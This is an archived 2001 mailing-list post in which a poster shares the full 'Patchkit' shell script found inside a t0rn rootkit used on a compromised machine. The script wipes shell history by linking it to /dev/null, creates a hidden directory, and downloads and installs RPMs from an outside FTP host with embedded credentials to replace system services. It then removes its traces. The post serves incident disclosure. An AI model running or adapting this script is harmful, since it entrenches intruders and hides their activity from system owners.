I saw this version of t0rn back in feb. The attackers used t666.c to exploit the box. Toby A patch found in the source.... #!/bin/sh inf="Patchkit by beast" BLK='' RED='' GRN='' YEL='' BLU='' MAG='' CYN='' WHI='' DRED='' DGRN='' DYEL='' DBLU='' DMAG='' DCYN='' DWHI='' RES='' echo "${GRN}Patching Sequence Started..." echo "${YEL}Fixing history file in /bin" echo "${DRED}RE-Initiating bash_history..." echo "${GRN}Done, linked to /dev/null ;)" rm -rf /bin/.bash_history ln -s /dev/null /bin/.bash_history echo "${DRED}Creating temp path..." mkdir -p /usr/src/.puta/rpm echo "${DWHI}*${GRN}-Connected to dumpsite-${DWHI}*" echo "${DWHI}*************************" cd /usr/src/.puta/rpm echo "${DRED}Upgrading WU-FTP, Please hold" echo "${YEL}Fetching RPM file...${CYN}" ncftpget -u natas187 -p anpwhsgh ftp://ftp.fortunecity.com/help/wu.rpm echo "${DRED}Executing WU upgrade...${GRN}" rpm -Uv wu.rpm echo "${DRED}Upgrading Statd, Please hold" echo "${YEL}Fetching RPM file...${CYN}" ncftpget -u natas187 -p anpwhsgh ftp://ftp.fortunecity.com/help/stat.rpm echo "${DRED}Executing Statd upgrade...${GRN}" rpm -Uv stat.rpm echo "${DRED}Upgrading Vixie, Please hold" echo "${YEL}Fetching RPM file...${CYN}" ncftpget -u natas187 -p anpwhsgh ftp://ftp.fortunecity.com/help/vixie.rpm echo "${DRED}Executing Vixie upgrade...${GRN}" rpm -Uv vixie.rpm echo "${DRED}Upgrading BIND, Please hold" echo "${YEL}Fetching RPM file...${CYN}" ncftpget -u natas187 -p anpwhsgh ftp://ftp.fortunecity.com/help/bind.rpm echo "${DRED}Executing BIND upgrade...${GRN}" rpm -Uv bind.rpm echo "${DRED}Upgrading Imapd, Please hold" echo "${YEL}Fetching RPM file...${CYN}" ncftpget -u natas187 -p anpwhsgh ftp://ftp.fortunecity.com/help/imap.rpm echo "${DRED}Executing Imapd upgrade...${GRN}" rpm -Uv imap.rpm echo "${DRED}Upgrading NC, Please hold" echo "${YEL}Fetching RPM file...${CYN}" ncftpget -u natas187 -p anpwhsgh ftp://ftp.fortunecity.com/help/nc.rpm echo "${DRED}Executing NC upgrade...${GRN}" rpm -Uv nc.rpm echo "${YEL}Cleaning up old files..." rm -rf /usr/src/.puta/patch rm -rf /usr/src/.puta/rpm echo "${GRN}Patching done${RES}"
This archive was generated by hypermail 2b30 : Wed Jun 06 2001 - 07:09:52 PDT